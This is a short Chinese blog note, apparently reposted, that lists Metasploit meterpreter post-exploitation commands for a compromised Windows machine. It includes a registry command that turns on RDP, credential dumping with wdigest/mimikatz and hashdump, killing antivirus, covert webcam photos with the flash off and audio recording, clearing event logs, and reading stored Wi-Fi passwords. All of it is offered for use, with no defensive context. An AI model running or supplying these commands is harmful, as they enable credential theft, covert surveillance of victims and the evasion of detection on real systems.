MSF 內網滲透筆記


 

進入meterpreter模式

在meterpreter中輸入shell即可進入CMD窗口
接着即可執行CMD命令,例如打開RDP服務
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

 

meterpreter模式

1、輸入screenshot截個圖看看主人在干什么吧。

2、wdigest //抓取明文密碼(需加載mimikatz模塊)

3、bgrun killav //殺掉殺毒軟件

4、webcam_list //查看有沒有攝像頭

bgrun webcam //啟動攝像頭

webcam_snap -i 1 -v false //啟動攝像頭拍攝一張照片但不打開閃光燈

bgrun sound_recorder //啟動聲音錄制

5、bgrun hashdump //獲取哈希值

6、clearev //清除日志

 

 

7、bgrun post/windows/wlan/wlan_profile //讀取無線連接的賬號密碼

此處執行失敗換一種方式

在cmdshell下執行netsh wlan show profiles

 

 

最后

歡迎關注個人微信公眾號:Bypass--,每周原創一篇技術干貨。 

 

參考鏈接:

https://www.bodkin.ren/index.php/category/Tricks/

使用 MSF 路由轉發實現MSF框架的內網滲透

https://www.anquanke.com/post/id/86505

MSF框架實現“永恆之藍”的閃電攻擊

https://www.anquanke.com/post/id/86245


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM